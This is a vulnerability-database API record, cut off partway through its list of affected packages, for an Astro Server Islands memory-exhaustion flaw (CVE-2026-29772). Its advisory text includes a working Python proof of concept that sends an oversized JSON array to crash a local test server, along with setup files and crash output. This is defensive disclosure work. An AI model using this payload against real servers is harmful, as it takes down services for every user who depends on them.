Lookup for vulnerabilities affecting packages.

GET /api/vulnerabilities/91508?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91508?format=api",
    "vulnerability_id": "VCID-c6g3-td4y-gbgj",
    "summary": "Astro: Memory exhaustion DoS due to missing request body size limit in Server Islands\n### Summary\n\nAstro's Server Islands POST handler buffers and parses the full request body as JSON without enforcing a size limit. Because `JSON.parse()` allocates a V8 heap object for every element in the input, a crafted payload of many small JSON objects achieves ~15x memory amplification (wire bytes to heap bytes), allowing a single unauthenticated request to exhaust the process heap and crash the server. The `/_server-islands/[name]` route is registered on all Astro SSR apps regardless of whether any component uses `server:defer`, and the body is parsed before the island name is validated, so any Astro SSR app with the Node standalone adapter is affected.\n\n### Details\n\nAstro automatically registers a Server Islands route at `/_server-islands/[name]` on all SSR apps, regardless of whether any component uses `server:defer`. The POST handler in `packages/astro/src/core/server-islands/endpoint.ts` buffers the entire request body into memory and parses it as JSON with no size or depth limit:\n\n```js\n// packages/astro/src/core/server-islands/endpoint.ts (lines 55-56)\nconst raw = await request.text();    // full body buffered into memory — no size limit\nconst data = JSON.parse(raw);        // parsed into V8 object graph — no element count limit\n```\n\nThe request body is parsed before the island name is validated, so the attacker does not need to know any valid island name — `/_server-islands/anything` triggers the vulnerable code path. No authentication is required.\n\nAdditionally, `JSON.parse()` allocates a heap object for every array/object in the input, so a payload consisting of many empty JSON objects (e.g., `[{},{},{},...]`) achieves ~15x memory amplification (wire bytes to heap bytes). The entire object graph is held as a single live reference until parsing completes, preventing garbage collection. An 8.6 MB request is sufficient to crash a server with a 128 MB heap limit.\n\n### PoC\n\n**Environment:** Astro 5.18.0, `@astrojs/node` 9.5.4, Node.js 22 with `--max-old-space-size=128`.\n\nThe app does **not** use `server:defer` — this is a minimal SSR setup with no server island components. The route is still registered and exploitable.\n\n**Setup files:**\n\n`package.json`:\n```json\n{\n  \"name\": \"poc-server-islands-dos\",\n  \"scripts\": {\n    \"build\": \"astro build\",\n    \"start\": \"node --max-old-space-size=128 dist/server/entry.mjs\"\n  },\n  \"dependencies\": {\n    \"astro\": \"5.18.0\",\n    \"@astrojs/node\": \"9.5.4\"\n  }\n}\n```\n\n`astro.config.mjs`:\n```js\nimport { defineConfig } from 'astro/config';\nimport node from '@astrojs/node';\n\nexport default defineConfig({\n  output: 'server',\n  adapter: node({ mode: 'standalone' }),\n});\n```\n\n`src/pages/index.astro`:\n```astro\n---\n---\n<html>\n<head><title>Astro App</title></head>\n<body>\n  <h1>Hello</h1>\n  <p>Just a plain SSR page. No server islands.</p>\n</body>\n</html>\n```\n\n`Dockerfile`:\n```dockerfile\nFROM node:22-slim\nWORKDIR /app\nCOPY package.json .\nRUN npm install\nCOPY . .\nRUN npm run build\nEXPOSE 4321\nCMD [\"node\", \"--max-old-space-size=128\", \"dist/server/entry.mjs\"]\n```\n\n`docker-compose.yml`:\n```yaml\nservices:\n  astro:\n    build: .\n    ports:\n      - \"4321:4321\"\n    deploy:\n      resources:\n        limits:\n          memory: 256m\n```\n\n**Reproduction:**\n\n```bash\n# Build and start\ndocker compose up -d\n\n# Verify server is running\ncurl http://localhost:4321/\n# => 200 OK\n```\n\n`crash.py`:\n```python\nimport requests\n\n# Any path under /_server-islands/ works — no valid island name needed\nTARGET = \"http://localhost:4321/_server-islands/x\"\n\n# 3M empty objects: each {} is ~3 bytes JSON but ~56-80 bytes as V8 object\n# 8.6 MB on wire → ~180+ MB heap allocation → exceeds 128 MB limit\nn = 3_000_000\npayload = '[' + ','.join(['{}'] * n) + ']'\nprint(f\"Payload: {len(payload) / (1024*1024):.1f} MB\")\n\ntry:\n    r = requests.post(TARGET, data=payload,\n        headers={\"Content-Type\": \"application/json\"}, timeout=30)\n    print(f\"Status: {r.status_code}\")\nexcept requests.exceptions.ConnectionError:\n    print(\"Server crashed (OOM killed)\")\n```\n\n```\n$ python crash.py\nPayload: 8.6 MB\nServer crashed (OOM killed)\n\n$ curl http://localhost:4321/\ncurl: (7) Failed to connect to localhost port 4321: Connection refused\n\n$ docker compose ps\nNAME      IMAGE     COMMAND   SERVICE   CREATED   STATUS    PORTS\n(empty — container was OOM killed)\n```\n\nThe server process is killed and does not recover. Repeated requests in a containerized environment with restart policies cause a persistent crash-restart loop.\n\n### Impact\n\nAny Astro SSR app with the Node standalone adapter is affected — the `/_server-islands/[name]` route is registered by default regardless of whether any component uses `server:defer`. Unauthenticated attackers can crash the server process with a single crafted HTTP request under 9 MB. In containerized environments with memory limits, repeated requests cause a persistent crash-restart loop, denying service to all users. The attack requires no authentication and no knowledge of valid island names — any value in the `[name]` parameter works because the body is parsed before the name is validated.",
    "aliases": [
        {
            "alias": "CVE-2026-29772"
        },
        {
            "alias": "GHSA-3rmj-9m5h-8fpv"
        }
    ],
    "fixed_packages": [
        {
            "url": "http://public2.vulnerablecode.io/api/packages/113791?format=api",
            "purl": "pkg:npm/%40astrojs/node@10.0.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@10.0.0"
        }
    ],
    "affected_packages": [
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843037?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-adapter-sessions-20250207124921",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-adapter-sessions-20250207124921"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843038?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-add-stable-20231208215901",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-add-stable-20231208215901"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843039?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-cloudcannon-fix-20230306211609",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-cloudcannon-fix-20230306211609"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843040?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-content-collections-20221215161753",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-content-collections-20221215161753"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843041?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-content-schemas-20221118232407",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-content-schemas-20221118232407"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843042?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-content-schemas-20221118233302",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-content-schemas-20221118233302"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843043?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-content-schemas-20221129235256",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-content-schemas-20221129235256"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843044?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-content-schemas-20221130135236",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-content-schemas-20221130135236"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843045?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-content-schemas-20221205202838",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-content-schemas-20221205202838"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843046?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-content-schemas-20221207142945",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-content-schemas-20221207142945"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843047?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-content-schemas-20221209180144",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-content-schemas-20221209180144"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843048?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-edge-middleware-verification-20240205180401",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-edge-middleware-verification-20240205180401"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843049?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-edge-nested-20240223135627",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-edge-nested-20240223135627"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843050?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-error-overlay-20221130171441",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-error-overlay-20221130171441"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843051?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-error-overlay-20221203190718",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-error-overlay-20221203190718"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843052?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-experimental-assets-20230307131344",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-experimental-assets-20230307131344"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843053?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-experimental-container-20240613104104",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-experimental-container-20240613104104"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843054?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-fixwin-20221216184820",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-fixwin-20221216184820"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843055?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-imgcache-20220929145446",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-imgcache-20220929145446"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843056?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-isr-20240110194136",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-isr-20240110194136"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843057?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-isr-20240125224234",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-isr-20240125224234"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843058?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-join-base-20221208170900",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-join-base-20221208170900"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843059?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-loaders-20230222215040",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-loaders-20230222215040"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843060?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-middleware-20230405160200",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-middleware-20230405160200"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843061?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-node-standalone-20221011210529",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-node-standalone-20221011210529"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843062?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-node-trailing-slash-20240118204342",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-node-trailing-slash-20240118204342"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843063?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-prerender-20221209214618",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-prerender-20221209214618"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843064?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-prerender-20221209224429",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-prerender-20221209224429"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843065?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-prerender-20221215200617",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-prerender-20221215200617"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843066?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-prerender-20221215222121",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-prerender-20221215222121"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843067?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-rc-20220721064837",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-rc-20220721064837"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843068?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-rc-20220722032928",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-rc-20220722032928"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843069?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-rc-20220725043302",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-rc-20220725043302"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843070?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-rc-20220726043527",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-rc-20220726043527"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843071?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-server-islands-20240621194657",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-server-islands-20240621194657"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843072?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-server-islands-20240703133809",
            "is_vulnerable": true,
